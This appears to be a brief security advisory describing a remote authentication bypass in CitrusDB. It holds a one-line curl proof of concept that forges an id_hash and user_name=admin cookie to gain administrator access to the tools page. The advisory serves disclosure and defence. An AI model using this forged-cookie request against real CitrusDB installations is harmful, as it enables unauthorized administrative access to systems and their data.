CitrusDB Remote Authentication Bypass Vulnerability

info
discussion
exploit
solution
references

CitrusDB Remote Authentication Bypass Vulnerability

No exploit is required.

The following proof of concept is available for demonstrating cookie information sufficient to log in as 'admin':
curl -D - --cookie "id_hash=4b3b2c8666298ae9771e9b3d38c3f26e;
user_name=admin" http://www.example.com/citrusdb/tools/index.php